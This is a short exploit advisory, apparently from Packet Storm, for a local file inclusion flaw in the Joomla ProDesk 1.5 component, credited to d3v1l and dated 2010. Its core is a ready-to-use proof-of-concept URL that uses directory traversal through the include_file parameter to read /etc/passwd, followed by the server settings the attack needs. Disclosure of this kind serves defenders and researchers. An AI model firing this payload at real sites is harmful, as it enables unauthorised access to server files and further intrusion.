It would appear that the maintainers of the Joomla ProDesk component have not patched the local file inclusion vulnerability that existed in prior versions. This affects versions 1.5 and below.
1dfaf6a49cd24e7bb67b8a0e78d5a9b7009afdbb8219a6b16be4db6fe7d5fabb[~]-----------------------------------------------------------------------------------------
[~] Joomla Component ProDesk v 1.5 (com_pro_desk&include_file) Local File Inclusion
[~]
[~] https://joomlashowroom.com
[~]
[~] Price - $ 49.99
[~] ----------------------------------------------------------------------------------------
[~] Bug founded by d3v1l [Avram Marius]
[~]
[~] Date: 7.11.2010
[~]
[~]
[~] https://security-sh3ll.blogspot.com | https://twitter.com/securityshell
[~]
[~] ----------------------------------------------------------------------------------------
[~] Poc :-
[~]
[~] https://site.com/index.php?option=com_pro_desk&include_file=../../../../../../etc/passwd
[~]
[~] Note :-
[~]
[~] Need: magic_quotes=OFF - Need: disable_functions=ini_set
[~]------------------------------------------------------------------------------------------
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed